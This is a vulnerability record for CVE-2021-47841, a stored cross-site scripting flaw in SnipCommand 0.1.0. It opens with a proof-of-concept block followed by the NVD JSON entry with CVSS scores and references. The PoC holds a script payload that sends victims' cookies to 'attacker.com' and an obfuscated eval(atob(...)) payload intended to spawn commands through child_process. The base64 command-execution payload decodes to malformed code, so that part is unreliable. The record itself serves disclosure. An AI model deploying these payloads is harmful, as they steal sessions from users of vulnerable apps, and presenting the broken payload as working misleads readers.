CVE-2021-47841

// SnipCommand Stored XSS PoC // Target: SnipCommand 0.1.0 // Payload: Inject malicious JavaScript via title or file input fields const vulnerablePayload = { title: '<script>fetch("https://attacker.com/log?cookie="+document.cookie)</script>', file: '<img src=x onerror="eval(atob(\'cmVxdWlyZShcImNoaWxkX3Byb2Nlc3NcIikuc3Bhd25cImNhbGNcIiwiY2FsYyAtZSAnL3RtcC9zaGVsbC5zaCcpXCJcbnt9XCJcbi5leGVjKClcblxuY29uc3Qgc2hlbGwgPSByZXF1aXJlKCdjaGlsZF9wcm9jZXNzJykuZXhlY3VUeXBlKCdjYWxjJyk7XG5zaGVsbC5zdGRvdXQuZW5kKCdjbG9zZScpO1xu\'))">', command: 'echo "Test Command"' }; // Attack chain: // 1. Attacker injects XSS payload through title/file fields // 2. Payload is stored in database without sanitization // 3. Victim views the command snippet // 4. Malicious JavaScript executes in victim's browser // 5. Attacker steals session cookies or executes further attacks

{"cve": {"id": "CVE-2021-47841", "sourceIdentifier": "[email protected]", "published": "2026-01-16T19:16:09.860", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "SnipCommand 0.1.0 contains a cross-site scripting vulnerability that allows attackers to inject malicious payloads into command snippets. Attackers can execute arbitrary code by embedding malicious JavaScript that triggers remote command execution through file or title inputs."}, {"lang": "es", "value": "SnipCommand 0.1.0 contiene una vulnerabilidad de cross-site scripting que permite a los atacantes inyectar cargas útiles maliciosas en fragmentos de comandos. Los atacantes pueden ejecutar código arbitrario incrustando JavaScript malicioso que desencadena la ejecución remota de comandos a través de entradas de archivo o título."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://github.com/gurayyarar/SnipCommand", "source": "[email protected]"}, {"url": "https://imgur.com/a/I2reH1M", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/49829", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/snipcommand-persistent-cross-site-scripting", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/snipcommand-persistent-cross-site-scripting", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}